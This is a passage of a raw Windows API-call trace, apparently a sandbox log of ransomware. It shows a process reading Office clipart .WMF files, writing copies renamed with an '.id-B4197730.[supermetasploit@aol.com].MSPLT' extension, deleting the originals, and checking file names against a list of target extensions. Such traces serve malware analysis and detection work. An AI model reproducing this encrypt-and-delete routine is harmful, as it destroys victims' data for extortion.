Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0298.353] GetLastError () returned 0x0 [0298.353] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x1eb6, lpOverlapped=0x0) returned 1 [0298.507] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x1ec0, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x1ec0, lpOverlapped=0x0) returned 1 [0298.511] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.511] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0298.511] SetEndOfFile (hFile=0x42c) returned 1 [0298.512] CloseHandle (hObject=0x42c) returned 1 [0298.513] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.513] SetEndOfFile (hFile=0x454) returned 1 [0298.524] CloseHandle (hObject=0x454) returned 1 [0298.524] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0298.525] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00045_.wmf")) returned 1 [0298.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.526] lstrlenW (lpString=".doc") returned 4 [0298.526] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.526] lstrlenW (lpString=".docx") returned 5 [0298.526] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.526] lstrlenW (lpString=".pdf") returned 4 [0298.526] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.526] lstrlenW (lpString=".xls") returned 4 [0298.526] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.526] lstrlenW (lpString=".xlsx") returned 5 [0298.526] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.526] lstrlenW (lpString=".ppt") returned 4 [0298.526] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.526] lstrlenW (lpString=".zip") returned 4 [0298.526] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.526] lstrlenW (lpString=".rar") returned 4 [0298.526] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.526] lstrlenW (lpString=".bz2") returned 4 [0298.526] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.526] lstrlenW (lpString=".7z") returned 3 [0298.526] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.526] lstrlenW (lpString=".dbf") returned 4 [0298.526] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.526] lstrlenW (lpString=".1cd") returned 4 [0298.526] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.526] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.526] lstrlenW (lpString=".jpg") returned 4 [0298.527] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.527] lstrlenW (lpString=".doc") returned 4 [0298.527] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0298.527] lstrlenW (lpString=".docx") returned 5 [0298.527] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0298.527] lstrlenW (lpString=".pdf") returned 4 [0298.527] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0298.527] lstrlenW (lpString=".xls") returned 4 [0298.527] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0298.527] lstrlenW (lpString=".xlsx") returned 5 [0298.527] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0298.527] lstrlenW (lpString=".ppt") returned 4 [0298.527] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0298.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.527] lstrlenW (lpString=".zip") returned 4 [0298.527] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0298.527] lstrlenW (lpString=".rar") returned 4 [0298.527] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0298.527] lstrlenW (lpString=".bz2") returned 4 [0298.527] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0298.527] lstrlenW (lpString=".7z") returned 3 [0298.527] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0298.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.527] lstrlenW (lpString=".dbf") returned 4 [0298.527] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0298.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.527] lstrlenW (lpString=".1cd") returned 4 [0298.527] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0298.527] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00045_.WMF") returned 68 [0298.528] lstrlenW (lpString=".jpg") returned 4 [0298.528] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0298.528] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0298.528] lstrlenW (lpString="BL00098_.WMF") returned 12 [0298.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.528] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=1012) returned 1 [0298.528] CloseHandle (hObject=0x454) returned 1 [0298.529] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf")) returned 0x220 [0298.529] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0298.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0298.529] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.529] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.529] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0298.581] GetLastError () returned 0x0 [0298.581] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x3f4, lpOverlapped=0x0) returned 1 [0298.764] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x400, lpOverlapped=0x0) returned 1 [0298.765] ReadFile (in: hFile=0x454, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0298.766] WriteFile (in: hFile=0x42c, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0298.766] SetEndOfFile (hFile=0x42c) returned 1 [0298.766] CloseHandle (hObject=0x42c) returned 1 [0298.767] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0298.767] SetEndOfFile (hFile=0x454) returned 1 [0298.772] CloseHandle (hObject=0x454) returned 1 [0298.772] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.579] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00098_.wmf")) returned 1 [0299.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.590] lstrlenW (lpString=".doc") returned 4 [0299.590] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.590] lstrlenW (lpString=".docx") returned 5 [0299.590] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.590] lstrlenW (lpString=".pdf") returned 4 [0299.590] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.590] lstrlenW (lpString=".xls") returned 4 [0299.590] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.590] lstrlenW (lpString=".xlsx") returned 5 [0299.590] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.590] lstrlenW (lpString=".ppt") returned 4 [0299.590] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.590] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.590] lstrlenW (lpString=".zip") returned 4 [0299.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.590] lstrlenW (lpString=".rar") returned 4 [0299.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.590] lstrlenW (lpString=".bz2") returned 4 [0299.590] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.591] lstrlenW (lpString=".7z") returned 3 [0299.591] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.591] lstrlenW (lpString=".dbf") returned 4 [0299.591] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.591] lstrlenW (lpString=".1cd") returned 4 [0299.591] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.591] lstrlenW (lpString=".jpg") returned 4 [0299.591] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.591] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.591] lstrlenW (lpString=".doc") returned 4 [0299.591] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.591] lstrlenW (lpString=".docx") returned 5 [0299.591] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.591] lstrlenW (lpString=".pdf") returned 4 [0299.591] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.591] lstrlenW (lpString=".xls") returned 4 [0299.591] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.591] lstrlenW (lpString=".xlsx") returned 5 [0299.591] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.592] lstrlenW (lpString=".ppt") returned 4 [0299.592] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.592] lstrlenW (lpString=".zip") returned 4 [0299.592] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.592] lstrlenW (lpString=".rar") returned 4 [0299.592] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.592] lstrlenW (lpString=".bz2") returned 4 [0299.592] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.592] lstrlenW (lpString=".7z") returned 3 [0299.592] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.592] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.592] lstrlenW (lpString=".dbf") returned 4 [0299.592] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.595] lstrlenW (lpString=".1cd") returned 4 [0299.595] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.595] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00098_.WMF") returned 68 [0299.597] lstrlenW (lpString=".jpg") returned 4 [0299.597] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.600] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.600] lstrlenW (lpString="BL00234_.WMF") returned 12 [0299.600] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0299.685] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=9304) returned 1 [0299.685] CloseHandle (hObject=0x47c) returned 1 [0299.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf")) returned 0x220 [0299.686] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0299.687] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.687] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.687] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0299.688] GetLastError () returned 0x0 [0299.688] ReadFile (in: hFile=0x47c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x2458, lpOverlapped=0x0) returned 1 [0299.693] WriteFile (in: hFile=0x440, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0x2460, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0x2460, lpOverlapped=0x0) returned 1 [0299.695] ReadFile (in: hFile=0x47c, lpBuffer=0x3115020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesRead=0x2c0fecc*=0x0, lpOverlapped=0x0) returned 1 [0299.695] WriteFile (in: hFile=0x440, lpBuffer=0x3115020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3115020*, lpNumberOfBytesWritten=0x2c0fc94*=0xec, lpOverlapped=0x0) returned 1 [0299.695] SetEndOfFile (hFile=0x440) returned 1 [0299.695] CloseHandle (hObject=0x440) returned 1 [0299.704] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.704] SetEndOfFile (hFile=0x47c) returned 1 [0299.708] CloseHandle (hObject=0x47c) returned 1 [0299.708] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0299.709] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00234_.wmf")) returned 1 [0299.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.710] lstrlenW (lpString=".doc") returned 4 [0299.710] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.710] lstrlenW (lpString=".docx") returned 5 [0299.710] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.710] lstrlenW (lpString=".pdf") returned 4 [0299.710] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.710] lstrlenW (lpString=".xls") returned 4 [0299.710] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.710] lstrlenW (lpString=".xlsx") returned 5 [0299.710] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.710] lstrlenW (lpString=".ppt") returned 4 [0299.710] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.710] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.710] lstrlenW (lpString=".zip") returned 4 [0299.710] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.710] lstrlenW (lpString=".rar") returned 4 [0299.710] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.710] lstrlenW (lpString=".bz2") returned 4 [0299.710] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.710] lstrlenW (lpString=".7z") returned 3 [0299.710] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.711] lstrlenW (lpString=".dbf") returned 4 [0299.711] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.711] lstrlenW (lpString=".1cd") returned 4 [0299.711] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.711] lstrlenW (lpString=".jpg") returned 4 [0299.711] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.711] lstrlenW (lpString=".doc") returned 4 [0299.711] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0299.711] lstrlenW (lpString=".docx") returned 5 [0299.711] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0299.711] lstrlenW (lpString=".pdf") returned 4 [0299.711] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0299.711] lstrlenW (lpString=".xls") returned 4 [0299.711] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0299.711] lstrlenW (lpString=".xlsx") returned 5 [0299.711] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0299.711] lstrlenW (lpString=".ppt") returned 4 [0299.711] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0299.711] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.711] lstrlenW (lpString=".zip") returned 4 [0299.712] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0299.712] lstrlenW (lpString=".rar") returned 4 [0299.712] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0299.712] lstrlenW (lpString=".bz2") returned 4 [0299.712] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0299.712] lstrlenW (lpString=".7z") returned 3 [0299.712] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0299.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.712] lstrlenW (lpString=".dbf") returned 4 [0299.712] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0299.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.712] lstrlenW (lpString=".1cd") returned 4 [0299.712] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0299.712] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00234_.WMF") returned 68 [0299.712] lstrlenW (lpString=".jpg") returned 4 [0299.712] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0299.712] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0299.712] lstrlenW (lpString="BL00247_.WMF") returned 12 [0299.712] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0299.713] GetFileSizeEx (in: hFile=0x47c, lpFileSize=0x2c0ff14 | out: lpFileSize=0x2c0ff14*=14444) returned 1 [0299.713] CloseHandle (hObject=0x47c) returned 1 [0299.713] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf")) returned 0x220 [0299.714] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0299.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x47c [0299.714] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.714] SetFilePointerEx (in: hFile=0x47c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec0 | out: lpNewFilePointer=0x0) returned 1 [0299.714] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00247_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00247_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 